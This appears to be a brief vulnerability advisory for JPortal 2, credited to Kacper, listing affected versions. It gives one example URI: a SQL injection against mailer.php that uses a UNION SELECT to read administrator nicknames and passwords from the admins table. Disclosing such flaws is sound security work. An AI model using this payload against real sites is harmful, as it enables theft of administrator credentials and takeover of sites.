Kacper is credited with the discovery of this vulnerability.
Vulnerable
JPortal JPortal 2
Not Vulnerable
Code
Attackers can use a browser to exploit this issue.The following example URI is available:http://www.example.com/mailer.php?to=999999999999'+union+select+0,1,2,3,4,5,concat(nick,char(58),pass),7+from+admins+limit+1/*